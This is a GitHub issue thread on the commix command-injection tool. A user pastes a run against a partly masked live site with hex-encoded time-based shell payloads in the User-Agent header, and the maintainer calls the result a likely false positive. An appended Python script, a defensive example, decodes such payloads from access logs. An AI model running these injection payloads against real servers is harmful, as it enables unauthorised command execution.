commixproject / commix

Automated All-in-One OS Command Injection Exploitation Tool.
https://commixproject.com

commix(os_shell) > id response A` #68

Closed lacroutelacroute closed 7 years ago

lacroutelacroute commented 7 years ago

I do not understand the system's response

I am a whitehat bug bounty researcher. This answer is not isolated; I encounter it every time in remote.

:~$ sudo commix -v 1 -u "http://ci****.il***********.com/?save-as=Bookmark&filename=Peter%2bWinter" --cookie="geoloccitta=Pau;geolocprov=deleted" --random-agent -p Cookie --technique=t --level=3 --tamper=hexencode --batch
[sudo] Mot de passe de fakessh :
commix.py
commix banner: v1.8-dev#22, http://commixproject.com (@commixproject)

+-- Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst) +--

[*] Checking connection to the target URL... [ SUCCEED ]
[*] Identifying the target server... [ SUCCEED ]
[+] The target server was identified as Apache.
[*] Identifying the target application ... [ FAILED ]
[!] Warning: Heuristics have failed to identify target application.
[*] Loading tamper script(s):
[~] hexencode
[!] Warning: Heuristics have failed to identify server's operating system.
[?] Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > U
[*] Identifing the indicated web-page charset... [ SUCCEED ]
[!] Warning: The indicated web-page charset iso-8859-1 seems unknown.
[*] Setting the HTTP header User-Agent for tests.
[*] Estimating the target URL response time... [ SUCCEED ]
[*] Testing the (blind) time-based command injection technique...
[*] Testing the reliability of used payload...
[+] The HTTP header User-Agent seems injectable via (blind) time-based command injection technique.
[~] Payload: 26736c65657020302026267374723d24286563686f205a46534b475829202626737472313d242865787072206c656e677468202224737472222926265b2036202d6571202473747231205d202626736c656570203120

Pseudo-Terminal (type '?' for available options)
commix(os_shell) > id

[*] Retrieving the length of execution output... | 26736c65657020302026267374723d2224286563686f20242869642929222626737472313d242865787072206c656e677468202224737472222926265b2031202d6571202473747231205d202626736c656570203120 | 26736c65657020302026267374723d2224286563686f20242869642929222626737472313d242865787072206c656e677468202224737472222926265b2032202d6571202473747231205d202626736c656570203120

[+] Retrieved 2 characters.
[*] Presuming the execution output, please wait...

|_ 26736c6565702030202626636d643d2224286563686f20242869642929222626636861723d24286578707220737562737472202224636d6422203120312926267374723d24287072696e7466202564202227246368617227222926265b203635202d657120247b7374727d205d202626736c656570203120
|_ 26736c6565702030202626636d643d2224286563686f20242869642929222626636861723d24286578707220737562737472202224636d6422203220312926267374723d24287072696e7466202564202227246368617227222926265b203936202d657120247b7374727d205d202626736c656570203120

A`

[*] Finished in 00:00:02.

commix(os_shell) >

stasinopoulos commented 7 years ago

Hey, this is probably due to a false positive result. I'm going to check out the heuristics in order to possibly prevent this kind of false positive results. Thanks for the heads up.
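From the receiving side, the run in this report leaves a recognisable trace: with `--tamper=hexencode` the probes reach the server as long hex strings, here in the User-Agent header. The following is an added example, not part of the thread and not commix code, showing how an access-log check could decode such runs and flag the ones that hide shell syntax. It assumes the combined log format and that the header value is logged as sent; all function names and the sample log lines are constructed for illustration.

```python
import re

# Assumption: combined log format, where the User-Agent is the last quoted field.
UA_FIELD = re.compile(r'"([^"]*)"\s*$')
# A long run of hex digits is unusual inside a genuine User-Agent value.
HEX_RUN = re.compile(r"[0-9a-fA-F]{24,}")
# Shell constructs of the kind a time-based probe needs (chaining, delays).
SHELL_HINTS = re.compile(r"sleep\s+\d|\$\(|&&|expr\s+(?:length|substr)")


def decode_hex_runs(value):
    """Return printable ASCII decodings of the long hex runs in value."""
    decoded = []
    for match in HEX_RUN.finditer(value):
        run = match.group(0)
        # The run may start mid-byte when it is glued to a version number,
        # so try both nibble alignments and keep the first printable one.
        for offset in (0, 1):
            chunk = run[offset:]
            chunk = chunk[: len(chunk) - len(chunk) % 2]
            raw = bytes.fromhex(chunk)
            if raw and all(32 <= b < 127 for b in raw):
                decoded.append(raw.decode("ascii"))
                break
    return decoded


def scan_access_log(lines):
    """Return (line_number, decoded_text) for User-Agents hiding shell syntax."""
    hits = []
    for number, line in enumerate(lines, 1):
        field = UA_FIELD.search(line)
        if not field:
            continue
        for text in decode_hex_runs(field.group(1)):
            if SHELL_HINTS.search(text):
                hits.append((number, text))
    return hits


# Constructed sample data, not taken from the issue.
PROBE = "&sleep 0 &&[ 1 -eq 1 ] &&sleep 1 "
PREFIX = '198.51.100.7 - - [01/Jan/2017:00:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" '
SAMPLE_LOG = [
    PREFIX + '"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"',
    PREFIX + '"Mozilla/5.0 ' + PROBE.encode().hex() + '"',
    PREFIX + '"builder/e3b0c44298fc1c149afbf4c8996fb92427ae41e4"',
]

if __name__ == "__main__":
    for number, text in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: hex-encoded shell syntax in User-Agent: {text!r}")
```

The third sample line carries a hash-like hex run that does not decode to printable text, so only the second line is reported.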